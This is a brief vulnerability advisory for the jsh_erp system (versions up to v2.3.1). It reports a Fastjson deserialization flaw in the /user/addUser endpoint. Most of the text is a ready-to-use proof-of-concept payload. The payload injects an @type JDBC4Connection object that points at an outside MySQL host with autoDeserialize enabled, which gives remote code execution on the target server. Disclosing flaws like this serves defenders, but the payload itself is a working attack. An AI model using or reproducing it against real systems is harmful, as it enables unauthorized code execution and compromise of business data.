jsh_erp3

(Updated: )

The /user/addUser endpoint is vulnerable to a Fastjson deserialization attack.

Vulnerable Versions: <= v2.3.1

Vulnerable Endpoint: /user/addUser

Proof of Concept (POC):

1
info={"loginName":"111","username":{"@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"120.26.138.45","portToConnectTo":3308,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS":"1"},"databaseToConnectTo":"d645873","url":"xxx"},"orgAbr":"","orgaId":"","selectType":"org","orgaUserRelId":"","id":"","position":"","phonenum":"","email":"","userBlngOrgaDsplSeq":"","description":""}

Details:

image-20250601172459055